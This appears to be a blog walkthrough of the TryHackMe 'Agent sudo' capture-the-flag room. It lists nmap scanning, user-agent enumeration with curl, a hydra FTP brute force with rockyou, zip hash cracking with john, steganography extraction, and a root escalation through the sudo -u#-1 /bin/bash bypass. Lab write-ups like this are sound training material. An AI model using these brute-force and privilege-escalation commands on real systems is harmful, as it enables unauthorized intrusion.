Step 1 : Connect to TryHackMe and start target machine
- Download OpenVPN configuration setting from TryHackMe platform
- Connect to TryHackMe by running the command in kali terminal:
sudo openvpn /pathtoOVPNfile.ovpn
3. Start machine in ‘Agent sudo’ room — target ip address will be displayed in a minute.
https://tryhackme.com/room/agentssudoctf
Step 2 : Information gathering using Nmap
- Start nmap scan of the target ip:
nmap -A -O <target ip>
Step 3: Detailed Findings
Open ports:
21 : FTP
22 : SSH
80 : http
- Accessing port 80 http
View source code > No info found
2. Navigating to robots.txt > No details found
3. Using dirbuster to find directories and files > Found nothing interesting
4. Observing the message in port 80, used curl to get details
curl -A -L <targetip>
5. As the message suggest using own ‘user-agent’ and signature suggests that codename is alphabet, so trying to use curl with -A flag and different alphabets
curl -A “A” -L <targetip>
curl -A “B” -L <targetip>
curl -A “C” -L <targetip> found agent name chris
6. As FTP port open, trying to brute force using hydra to identified FTP credentials
hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.208.107 ftp 21
7. Logging into FTP using above findings > Found 3 files > copied all 3 files to local machine
ftp <targetip>
Get <filename>
8. Opening the copied files
9. Based on above hint now tying to extract data from other 2 image files using stegextract.
Extracting files from images
binwalk cutie.jpg -e
Found _cutie.jpg.extracted > which had 4 files
Cracking .zip file using zip2john
zip2john 8702.zip >test.txt
cracking the hash in test.txt using john > found password to open zip file
john test.txt
Extracting 8702.zip using 7z
7z e 8702.zip
cat To_agentR.txt
Found message to extract files from cute-alien.jpg
Used cyberchef to crack the hint.
Used steghide to extract hidden message
steghide extract -sf cute-alien.jpg
Found passowrd for agent james
10. Using above information for logging into SSH port with user james and found password > SSH logi successful
ssh james@<targetip>
11. Found User_flag.txt
12. Checking for privileges, sudo -l
13. Got root access
sudo -u#-1 /bin/bash
Found root.txt
With these steps, I was able to answer all questions posted in agent sudo room on TryHackMe.
Thank you for reading this blog..